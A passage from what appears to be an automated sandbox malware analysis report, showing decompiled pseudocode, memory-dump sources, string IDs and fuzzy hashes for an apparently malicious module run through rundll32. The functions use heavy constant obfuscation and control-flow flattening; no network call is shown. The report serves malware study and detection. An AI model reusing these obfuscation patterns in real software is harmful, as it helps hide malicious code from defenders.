                                                                                                                      				E00698519(_v32, _v80, _v20);
                                                                                                                      				_t387 = 0x4d23f0b;
                                                                                                                      				goto L14;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                      • API String ID: 0-1604698900
                                                                                                                      • Opcode ID: 61bafb9737c5d27b091d4b21d34588b9bdb1db9f31531dfa9d6f3872347ca89f
                                                                                                                      • Instruction ID: 93319ba8c4359d017b1af6b2dac07be3f729809a4c96aad7872edf0d284ba75d
                                                                                                                      • Opcode Fuzzy Hash: 61bafb9737c5d27b091d4b21d34588b9bdb1db9f31531dfa9d6f3872347ca89f
                                                                                                                      • Instruction Fuzzy Hash: 84F10F715097409FD368CF66D589A5BBBF2FBC4B48F10891DF29A86260D7B28949CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Version$ClipboardFormatRegister
                                                                                                                      • String ID: MSWHEEL_ROLLMSG
                                                                                                                      • API String ID: 2888461884-2485103130
                                                                                                                      • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                      • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 79%
                                                                                                                      			E0069CB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				intOrPtr _v1564;
                                                                                                                      				intOrPtr _v1568;
                                                                                                                      				intOrPtr _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				void* _t341;
                                                                                                                      				void* _t370;
                                                                                                                      				void* _t379;
                                                                                                                      				intOrPtr _t382;
                                                                                                                      				intOrPtr _t385;
                                                                                                                      				void* _t396;
                                                                                                                      				intOrPtr _t399;
                                                                                                                      				intOrPtr _t436;
                                                                                                                      				signed int _t437;
                                                                                                                      				signed int _t438;
                                                                                                                      				signed int _t439;
                                                                                                                      				signed int _t440;
                                                                                                                      				signed int _t441;
                                                                                                                      				signed int _t442;
                                                                                                                      				signed int _t443;
                                                                                                                      				signed int _t444;
                                                                                                                      				signed int* _t449;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t436 = 0;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(0);
                                                                                                                      				E006920B9(_t341);
                                                                                                                      				_v1572 = 0xe82680;
                                                                                                                      				_t449 =  &(( &_v1708)[5]);
                                                                                                                      				_v1568 = 0;
                                                                                                                      				_v1564 = 0;
                                                                                                                      				_t396 = 0x9368da1;
                                                                                                                      				_v1584 = 0x42403b;
                                                                                                                      				_v1584 = _v1584 + 0xffffd771;
                                                                                                                      				_v1584 = _v1584 ^ 0x00421785;
                                                                                                                      				_v1692 = 0xc00255;
                                                                                                                      				_t437 = 0x16;
                                                                                                                      				_v1692 = _v1692 / _t437;
                                                                                                                      				_v1692 = _v1692 + 0xffff6b87;
                                                                                                                      				_v1692 = _v1692 + 0xffff176e;
                                                                                                                      				_v1692 = _v1692 ^ 0x0004c90f;
                                                                                                                      				_v1668 = 0x5abcaa;
                                                                                                                      				_v1668 = _v1668 | 0xa6adf3e3;
                                                                                                                      				_v1668 = _v1668 + 0xffff713c;
                                                                                                                      				_v1668 = _v1668 << 6;
                                                                                                                      				_v1668 = _v1668 ^ 0xbfd49dc8;
                                                                                                                      				_v1700 = 0xb35187;
                                                                                                                      				_v1700 = _v1700 | 0x50a44dff;
                                                                                                                      				_v1700 = _v1700 + 0xfffff2e6;
                                                                                                                      				_v1700 = _v1700 >> 8;
                                                                                                                      				_v1700 = _v1700 ^ 0x0051b9c1;
                                                                                                                      				_v1644 = 0x4d7cc3;
                                                                                                                      				_v1644 = _v1644 + 0xffffa786;
                                                                                                                      				_v1644 = _v1644 | 0x8b8a715e;
                                                                                                                      				_v1644 = _v1644 ^ 0x6234f021;
                                                                                                                      				_v1644 = _v1644 ^ 0xe9f998a6;
                                                                                                                      				_v1624 = 0x204c5b;
                                                                                                                      				_v1624 = _v1624 + 0xffffa901;
                                                                                                                      				_v1624 = _v1624 + 0x49e1;
                                                                                                                      				_v1624 = _v1624 ^ 0x002fe6aa;
                                                                                                                      				_v1632 = 0xbb0a9b;
                                                                                                                      				_v1632 = _v1632 * 0x52;
                                                                                                                      				_v1632 = _v1632 | 0x83893080;
                                                                                                                      				_v1632 = _v1632 ^ 0xbbe905c0;
                                                                                                                      				_v1620 = 0x19fb1a;
                                                                                                                      				_v1620 = _v1620 | 0x985eae3d;
                                                                                                                      				_v1620 = _v1620 + 0xf613;
                                                                                                                      				_v1620 = _v1620 ^ 0x9864c971;
                                                                                                                      				_v1656 = 0x35ecb4;
                                                                                                                      				_v1656 = _v1656 * 0x29;
                                                                                                                      				_v1656 = _v1656 + 0x1081;
                                                                                                                      				_v1656 = _v1656 + 0xffffd324;
                                                                                                                      				_v1656 = _v1656 ^ 0x08a8fe56;
                                                                                                                      				_v1580 = 0xc60f6f;
                                                                                                                      				_v1580 = _v1580 + 0xffffd3e6;
                                                                                                                      				_v1580 = _v1580 ^ 0x00c233ea;
                                                                                                                      				_v1664 = 0x2df5c;
                                                                                                                      				_v1664 = _v1664 << 8;
                                                                                                                      				_v1664 = _v1664 * 0x4c;
                                                                                                                      				_v1664 = _v1664 + 0xffffaed7;
                                                                                                                      				_v1664 = _v1664 ^ 0xda40187b;
                                                                                                                      				_v1672 = 0x38409b;
                                                                                                                      				_v1672 = _v1672 * 0x33;
                                                                                                                      				_v1672 = _v1672 | 0x7fcdffbb;
                                                                                                                      				_v1672 = _v1672 ^ 0x7ff87770;
                                                                                                                      				_v1680 = 0xe751cb;
                                                                                                                      				_v1680 = _v1680 ^ 0x8590ed7d;
                                                                                                                      				_v1680 = _v1680 + 0xffffebc9;
                                                                                                                      				_v1680 = _v1680 * 0x5e;
                                                                                                                      				_v1680 = _v1680 ^ 0x01e2719c;
                                                                                                                      				_v1688 = 0x15e1cd;
                                                                                                                      				_v1688 = _v1688 + 0xfe19;
                                                                                                                      				_v1688 = _v1688 + 0xffffc88c;
                                                                                                                      				_v1688 = _v1688 << 7;
                                                                                                                      				_v1688 = _v1688 ^ 0x0b5f3deb;
                                                                                                                      				_v1696 = 0x33a377;
                                                                                                                      				_v1696 = _v1696 << 0xa;
                                                                                                                      				_v1696 = _v1696 ^ 0xfb2d04b5;
                                                                                                                      				_v1696 = _v1696 | 0xd2f07883;
                                                                                                                      				_v1696 = _v1696 ^ 0xf7fa7ce3;
                                                                                                                      				_v1640 = 0x94004d;
                                                                                                                      				_v1640 = _v1640 >> 0xa;
                                                                                                                      				_t438 = 0x67;
                                                                                                                      				_v1640 = _v1640 * 0x3d;
                                                                                                                      				_v1640 = _v1640 >> 7;
                                                                                                                      				_v1640 = _v1640 ^ 0x00039ca1;
                                                                                                                      				_v1648 = 0xfcfef3;
                                                                                                                      				_v1648 = _v1648 * 0x18;
                                                                                                                      				_v1648 = _v1648 + 0x9c71;
                                                                                                                      				_v1648 = _v1648 | 0xf5d6202a;
                                                                                                                      				_v1648 = _v1648 ^ 0xf7f57601;
                                                                                                                      				_v1596 = 0xc58f80;
                                                                                                                      				_v1596 = _v1596 + 0xffff2f17;
                                                                                                                      				_v1596 = _v1596 ^ 0x00ce700d;
                                                                                                                      				_v1684 = 0xee980b;
                                                                                                                      				_v1684 = _v1684 >> 6;
                                                                                                                      				_v1684 = _v1684 / _t438;
                                                                                                                      				_v1684 = _v1684 + 0xffff2a3f;
                                                                                                                      				_v1684 = _v1684 ^ 0xfff3655c;
                                                                                                                      				_v1652 = 0x45a4a9;
                                                                                                                      				_v1652 = _v1652 >> 0xe;
                                                                                                                      				_t439 = 0x6e;
                                                                                                                      				_v1652 = _v1652 * 0x51;
                                                                                                                      				_v1652 = _v1652 + 0x9be3;
                                                                                                                      				_v1652 = _v1652 ^ 0x0004d4d8;
                                                                                                                      				_v1708 = 0x222243;
                                                                                                                      				_t176 =  &_v1708; // 0x222243
                                                                                                                      				_v1708 =  *_t176 / _t439;
                                                                                                                      				_v1708 = _v1708 << 9;
                                                                                                                      				_v1708 = _v1708 + 0xffff4a12;
                                                                                                                      				_v1708 = _v1708 ^ 0x009b5339;
                                                                                                                      				_v1612 = 0x464ea3;
                                                                                                                      				_v1612 = _v1612 + 0x89cc;
                                                                                                                      				_v1612 = _v1612 >> 2;
                                                                                                                      				_v1612 = _v1612 ^ 0x00167067;
                                                                                                                      				_v1588 = 0xd74d9e;
                                                                                                                      				_v1588 = _v1588 | 0x529da741;
                                                                                                                      				_v1588 = _v1588 ^ 0x52d09c78;
                                                                                                                      				_v1628 = 0x60b5eb;
                                                                                                                      				_v1628 = _v1628 >> 9;
                                                                                                                      				_t440 = 0x19;
                                                                                                                      				_v1628 = _v1628 / _t440;
                                                                                                                      				_v1628 = _v1628 ^ 0x000ff1bc;
                                                                                                                      				_v1676 = 0xfb7b01;
                                                                                                                      				_v1676 = _v1676 << 4;
                                                                                                                      				_v1676 = _v1676 + 0xffffc28e;
                                                                                                                      				_t441 = 0x1b;
                                                                                                                      				_v1676 = _v1676 / _t441;
                                                                                                                      				_v1676 = _v1676 ^ 0x0096cb21;
                                                                                                                      				_v1660 = 0xed67c1;
                                                                                                                      				_v1660 = _v1660 << 0xa;
                                                                                                                      				_v1660 = _v1660 | 0xef7d69c8;
                                                                                                                      				_v1660 = _v1660 << 2;
                                                                                                                      				_v1660 = _v1660 ^ 0xfff42fe1;
                                                                                                                      				_v1604 = 0x46c7e8;
                                                                                                                      				_v1604 = _v1604 << 0xf;
                                                                                                                      				_v1604 = _v1604 ^ 0x63fe3710;
                                                                                                                      				_v1636 = 0x7a345b;
                                                                                                                      				_v1636 = _v1636 + 0xd479;
                                                                                                                      				_v1636 = _v1636 + 0x8c7f;
                                                                                                                      				_v1636 = _v1636 ^ 0x00708a00;
                                                                                                                      				_v1704 = 0x80508e;
                                                                                                                      				_v1704 = _v1704 ^ 0xf958081f;
                                                                                                                      				_t442 = 0x4b;
                                                                                                                      				_v1704 = _v1704 / _t442;
                                                                                                                      				_t443 = 0x34;
                                                                                                                      				_v1704 = _v1704 * 0x44;
                                                                                                                      				_v1704 = _v1704 ^ 0xe2885afb;
                                                                                                                      				_v1576 = 0x325f4f;
                                                                                                                      				_t259 =  &_v1576; // 0x325f4f
                                                                                                                      				_v1576 =  *_t259 * 0x7a;
                                                                                                                      				_v1576 = _v1576 ^ 0x180920ed;
                                                                                                                      				_v1592 = 0xd554f9;
                                                                                                                      				_v1592 = _v1592 * 0x4e;
                                                                                                                      				_v1592 = _v1592 ^ 0x40f8e8dd;
                                                                                                                      				_v1608 = 0x6be570;
                                                                                                                      				_v1608 = _v1608 + 0x3d4f;
                                                                                                                      				_v1608 = _v1608 ^ 0x4461575c;
                                                                                                                      				_v1608 = _v1608 ^ 0x440eeedf;
                                                                                                                      				_v1616 = 0x4acfbf;
                                                                                                                      				_v1616 = _v1616 / _t443;
                                                                                                                      				_t444 = 0xe;
                                                                                                                      				_v1616 = _v1616 / _t444;
                                                                                                                      				_v1616 = _v1616 ^ 0x000fdd65;
                                                                                                                      				_v1600 = 0x55de88;
                                                                                                                      				_v1600 = _v1600 << 2;
                                                                                                                      				_v1600 = _v1600 ^ 0x01580110;
                                                                                                                      				do {
                                                                                                                      					while(_t396 != 0x196a97b) {
                                                                                                                      						if(_t396 == 0x2ca432c) {
                                                                                                                      							_push(_v1652);
                                                                                                                      							_push(_v1684);
                                                                                                                      							_t379 = E0069DCF7(_v1596, 0x6810f0, __eflags);
                                                                                                                      							E0069176B( &_v1560, __eflags);
                                                                                                                      							_t382 =  *0x6a3e10; // 0x0
                                                                                                                      							_t385 =  *0x6a3e10; // 0x0
                                                                                                                      							E0069E32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
                                                                                                                      							E0068A8B0(_v1704, _t379, _v1576);
                                                                                                                      							_t449 =  &(_t449[0xf]);
                                                                                                                      							_t396 = 0x9d0e956;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t396 == 0x9368da1) {
                                                                                                                      								_push(_v1644);
                                                                                                                      								_push(_v1584);
                                                                                                                      								_push(_v1700);
                                                                                                                      								_push( &_v1040);
                                                                                                                      								E006946BB(_v1692, _v1668);
                                                                                                                      								_t449 = _t449 - 0xc + 0x1c;
                                                                                                                      								_t396 = 0x196a97b;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								_t456 = _t396 - 0x9d0e956;
                                                                                                                      								if(_t396 != 0x9d0e956) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_push(_v1600);
                                                                                                                      									_push(_t436);
                                                                                                                      									_push(_t396);
                                                                                                                      									_push(_t436);
                                                                                                                      									_push(_t436);
                                                                                                                      									_push(_v1616);
                                                                                                                      									_push( &_v520);
                                                                                                                      									E0068AB87(_v1592, _v1608, _t456);
                                                                                                                      									_t436 =  !=  ? 1 : _t436;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t436;
                                                                                                                      					}
                                                                                                                      					_push(_v1620);
                                                                                                                      					_push(_v1632);
                                                                                                                      					_t370 = E0069DCF7(_v1624, 0x681020, __eflags);
                                                                                                                      					E0069176B( &_v1560, __eflags);
                                                                                                                      					_t399 =  *0x6a3e10; // 0x0
                                                                                                                      					_t336 = _t399 + 0x1c; // 0x1c
                                                                                                                      					_t337 = _t399 + 0x23c; // 0x23c
                                                                                                                      					E00691652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
                                                                                                                      					E0068A8B0(_v1640, _t370, _v1648);
                                                                                                                      					_t449 =  &(_t449[0xf]);
                                                                                                                      					_t396 = 0x9d0e956;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t396 - 0xce3b296;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L6;
                                                                                                                      			}
                                                                                                                      0x0069d12d
                                                                                                                      0x0069d13b
                                                                                                                      0x0069d149
                                                                                                                      0x0069d16e
                                                                                                                      0x0069d19b
                                                                                                                      0x0069d1ad
                                                                                                                      0x0069d1b2
                                                                                                                      0x0069d1b5
                                                                                                                      0x00000000
                                                                                                                      0x0069d096
                                                                                                                      0x0069d09c
                                                                                                                      0x0069d0e8
                                                                                                                      0x0069d0f3
                                                                                                                      0x0069d0fa
                                                                                                                      0x0069d109
                                                                                                                      0x0069d10a
                                                                                                                      0x0069d10f
                                                                                                                      0x0069d112
                                                                                                                      0x00000000
                                                                                                                      0x0069d09e
                                                                                                                      0x0069d09e
                                                                                                                      0x0069d0a0
                                                                                                                      0x00000000
                                                                                                                      0x0069d0a6
                                                                                                                      0x0069d0a6
                                                                                                                      0x0069d0b1
                                                                                                                      0x0069d0b2
                                                                                                                      0x0069d0b3
                                                                                                                      0x0069d0b4
                                                                                                                      0x0069d0b5
                                                                                                                      0x0069d0ca
                                                                                                                      0x0069d0cb
                                                                                                                      0x0069d0d8
                                                                                                                      0x0069d0d8
                                                                                                                      0x0069d0a0
                                                                                                                      0x0069d09c
                                                                                                                      0x0069d0db
                                                                                                                      0x0069d0e7
                                                                                                                      0x0069d0e7
                                                                                                                      0x0069d1bc
                                                                                                                      0x0069d1c5
                                                                                                                      0x0069d1cd
                                                                                                                      0x0069d1db
                                                                                                                      0x0069d212
                                                                                                                      0x0069d21f
                                                                                                                      0x0069d223
                                                                                                                      0x0069d22e
                                                                                                                      0x0069d243
                                                                                                                      0x0069d248
                                                                                                                      0x0069d24b
                                                                                                                      0x0069d24d
                                                                                                                      0x0069d24d
                                                                                                                      0x0069d24d
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                      • API String ID: 1514166925-553023378
                                                                                                                      • Opcode ID: 67cd9cf836bee7a7bae58fbc7eb6275c439750afef26172e25377275506725ee
                                                                                                                      • Instruction ID: d0faec9dc2d12c51be231ec58a2eb1603922922282a6a7b79576de6df17794bf
                                                                                                                      • Opcode Fuzzy Hash: 67cd9cf836bee7a7bae58fbc7eb6275c439750afef26172e25377275506725ee
                                                                                                                      • Instruction Fuzzy Hash: 6D0220B14083819FD3A4CF25C989A9BFBE6FBC4708F10891DF1D986260D7B1894ACF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E006870B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				char _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				void* _t276;
                                                                                                                      				intOrPtr _t301;
                                                                                                                      				void* _t302;
                                                                                                                      				intOrPtr _t305;
                                                                                                                      				void* _t306;
                                                                                                                      				intOrPtr _t312;
                                                                                                                      				intOrPtr* _t314;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t340;
                                                                                                                      				signed int _t343;
                                                                                                                      				signed int _t344;
                                                                                                                      				signed int _t345;
                                                                                                                      				signed int _t346;
                                                                                                                      				signed int _t347;
                                                                                                                      				signed int _t348;
                                                                                                                      				signed int _t349;
                                                                                                                      				signed int* _t352;
                                                                                                                      
                                                                                                                      				_t342 = _a4;
                                                                                                                      				_t314 = __edx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t276);
                                                                                                                      				_v8 = 0xc5496b;
                                                                                                                      				_t340 = 0;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_t352 =  &(( &_v128)[5]);
                                                                                                                      				_v96 = 0xa893e5;
                                                                                                                      				_v96 = _v96 >> 0xb;
                                                                                                                      				_t316 = 0x77ea95;
                                                                                                                      				_v96 = _v96 ^ 0xaec74c08;
                                                                                                                      				_v96 = _v96 + 0xffff5908;
                                                                                                                      				_v96 = _v96 ^ 0xaec6b223;
                                                                                                                      				_v120 = 0x460837;
                                                                                                                      				_v120 = _v120 << 0xe;
                                                                                                                      				_t343 = 0x61;
                                                                                                                      				_v120 = _v120 / _t343;
                                                                                                                      				_v120 = _v120 ^ 0xba448c5d;
                                                                                                                      				_v120 = _v120 ^ 0xbb13b056;
                                                                                                                      				_v100 = 0x5f60bb;
                                                                                                                      				_t344 = 0x67;
                                                                                                                      				_v100 = _v100 / _t344;
                                                                                                                      				_v100 = _v100 << 2;
                                                                                                                      				_v100 = _v100 << 0xe;
                                                                                                                      				_v100 = _v100 ^ 0xed0e0000;
                                                                                                                      				_v104 = 0xcda695;
                                                                                                                      				_t345 = 0x65;
                                                                                                                      				_v104 = _v104 * 0x11;
                                                                                                                      				_v104 = _v104 + 0xffffbfc8;
                                                                                                                      				_v104 = _v104 / _t345;
                                                                                                                      				_v104 = _v104 ^ 0x00229cab;
                                                                                                                      				_v88 = 0xcb9151;
                                                                                                                      				_v88 = _v88 + 0x59e9;
                                                                                                                      				_v88 = _v88 ^ 0x7c8ac0da;
                                                                                                                      				_v88 = _v88 >> 0xc;
                                                                                                                      				_v88 = _v88 ^ 0x0007c412;
                                                                                                                      				_v124 = 0xc27732;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 * 0x69;
                                                                                                                      				_v124 = _v124 >> 0xd;
                                                                                                                      				_v124 = _v124 ^ 0x0007c2e3;
                                                                                                                      				_v108 = 0xd451e;
                                                                                                                      				_v108 = _v108 | 0x03d9c36b;
                                                                                                                      				_v108 = _v108 << 0x10;
                                                                                                                      				_v108 = _v108 >> 7;
                                                                                                                      				_v108 = _v108 ^ 0x018efe00;
                                                                                                                      				_v24 = 0xe3266e;
                                                                                                                      				_v24 = _v24 ^ 0xb39ac5a6;
                                                                                                                      				_v24 = _v24 ^ 0xb37ebd00;
                                                                                                                      				_v60 = 0xdd6dbc;
                                                                                                                      				_v60 = _v60 << 0xc;
                                                                                                                      				_v60 = _v60 >> 0xd;
                                                                                                                      				_v60 = _v60 ^ 0x00066ea0;
                                                                                                                      				_v92 = 0xdc27c1;
                                                                                                                      				_v92 = _v92 ^ 0xb7b3afa8;
                                                                                                                      				_t346 = 0x51;
                                                                                                                      				_v92 = _v92 / _t346;
                                                                                                                      				_v92 = _v92 >> 0xb;
                                                                                                                      				_v92 = _v92 ^ 0x000e15f4;
                                                                                                                      				_v28 = 0x55985f;
                                                                                                                      				_t347 = 0x64;
                                                                                                                      				_v28 = _v28 * 0x1f;
                                                                                                                      				_v28 = _v28 ^ 0x0a58c7ef;
                                                                                                                      				_v64 = 0x4cb0ae;
                                                                                                                      				_v64 = _v64 * 0x59;
                                                                                                                      				_v64 = _v64 + 0xffff44f7;
                                                                                                                      				_v64 = _v64 ^ 0x1aa02a50;
                                                                                                                      				_v32 = 0x4c255b;
                                                                                                                      				_v32 = _v32 >> 0xc;
                                                                                                                      				_v32 = _v32 ^ 0x000ba021;
                                                                                                                      				_v68 = 0x1bdf1a;
                                                                                                                      				_v68 = _v68 << 0xe;
                                                                                                                      				_v68 = _v68 << 8;
                                                                                                                      				_v68 = _v68 ^ 0xc683e60f;
                                                                                                                      				_v36 = 0xeace7c;
                                                                                                                      				_v36 = _v36 ^ 0x32d1e31b;
                                                                                                                      				_v36 = _v36 ^ 0x32395a0e;
                                                                                                                      				_v52 = 0x5778bf;
                                                                                                                      				_v52 = _v52 * 0x53;
                                                                                                                      				_v52 = _v52 ^ 0x1c501c28;
                                                                                                                      				_v56 = 0x56e07;
                                                                                                                      				_v56 = _v56 / _t347;
                                                                                                                      				_v56 = _v56 ^ 0x000a0e4e;
                                                                                                                      				_v128 = 0x2ec397;
                                                                                                                      				_v128 = _v128 + 0xffff4016;
                                                                                                                      				_v128 = _v128 ^ 0xc29a5f5c;
                                                                                                                      				_v128 = _v128 << 0xa;
                                                                                                                      				_v128 = _v128 ^ 0xd1754ce1;
                                                                                                                      				_v112 = 0x486dea;
                                                                                                                      				_t159 =  &_v112; // 0x486dea
                                                                                                                      				_t348 = 0x16;
                                                                                                                      				_v112 =  *_t159 * 0x75;
                                                                                                                      				_v112 = _v112 << 3;
                                                                                                                      				_v112 = _v112 + 0xffff4e4a;
                                                                                                                      				_v112 = _v112 ^ 0x08d01f1a;
                                                                                                                      				_v116 = 0xad5672;
                                                                                                                      				_v116 = _v116 << 0xa;
                                                                                                                      				_v116 = _v116 * 0x32;
                                                                                                                      				_v116 = _v116 >> 1;
                                                                                                                      				_v116 = _v116 ^ 0x35c1a461;
                                                                                                                      				_v40 = 0x750aef;
                                                                                                                      				_v40 = _v40 << 0xe;
                                                                                                                      				_v40 = _v40 ^ 0x42b6a378;
                                                                                                                      				_v72 = 0x7e8fee;
                                                                                                                      				_v72 = _v72 << 0xe;
                                                                                                                      				_v72 = _v72 + 0x885b;
                                                                                                                      				_v72 = _v72 ^ 0xa3f43c0d;
                                                                                                                      				_v44 = 0x717d1a;
                                                                                                                      				_v44 = _v44 >> 0xf;
                                                                                                                      				_v44 = _v44 ^ 0x000f68d6;
                                                                                                                      				_v48 = 0x815897;
                                                                                                                      				_v48 = _v48 / _t348;
                                                                                                                      				_v48 = _v48 ^ 0x000d4a68;
                                                                                                                      				_v76 = 0xfbb4ce;
                                                                                                                      				_v76 = _v76 << 8;
                                                                                                                      				_v76 = _v76 + 0xffffed69;
                                                                                                                      				_v76 = _v76 ^ 0xfbbe0169;
                                                                                                                      				_v80 = 0xf07394;
                                                                                                                      				_v80 = _v80 << 0xf;
                                                                                                                      				_v80 = _v80 ^ 0x34c45092;
                                                                                                                      				_v80 = _v80 ^ 0x0d009df4;
                                                                                                                      				_v84 = 0xfdde74;
                                                                                                                      				_v84 = _v84 * 0x78;
                                                                                                                      				_v84 = _v84 << 7;
                                                                                                                      				_v84 = _v84 << 0xa;
                                                                                                                      				_v84 = _v84 ^ 0x8cc67a91;
                                                                                                                      				_v20 = 0xbaf80d;
                                                                                                                      				_t349 = 0x4e;
                                                                                                                      				_v20 = _v20 / _t349;
                                                                                                                      				_v20 = _v20 ^ 0x000183d9;
                                                                                                                      				do {
                                                                                                                      					while(_t316 != 0x77ea95) {
                                                                                                                      						if(_t316 == 0x220b753) {
                                                                                                                      							_t301 =  *0x6a3dfc; // 0x0
                                                                                                                      							_t302 = E00695B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
                                                                                                                      							_t352 =  &(_t352[0x10]);
                                                                                                                      							if(_t302 == _v88) {
                                                                                                                      								_t316 = 0xd86d689;
                                                                                                                      								continue;
